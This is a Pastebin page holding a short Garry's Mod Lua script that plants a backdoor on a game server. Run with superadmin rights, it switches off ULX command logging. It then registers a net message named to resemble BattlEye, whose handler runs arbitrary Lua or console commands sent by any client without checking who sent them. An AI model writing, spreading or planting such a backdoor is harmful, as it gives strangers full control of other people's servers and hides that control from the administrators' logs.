2much4Us

Untitled

Jun 1st, 2018
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. if ( ply:IsSuperAdmin() ) then
  2. if( ValidNetString("Infinity_Meme") ) then
  3.  
  4. else
  5. RunConsoleCommand( "ulx", "logecho", "0" )
  6. RunConsoleCommand( "ulx", "luarun", "util.AddNetworkString('_Battleye_Meme_') net.Receive('_Battleye_Meme_', function( length, ply ) local netString = net.ReadString() local bit = net.ReadBit() if bit == 1 then RunString(netString) else game.ConsoleCommand(netString .. '\n') end end)" )
  7. end
  8. end
Advertisement
Add Comment
Please, Sign In to add comment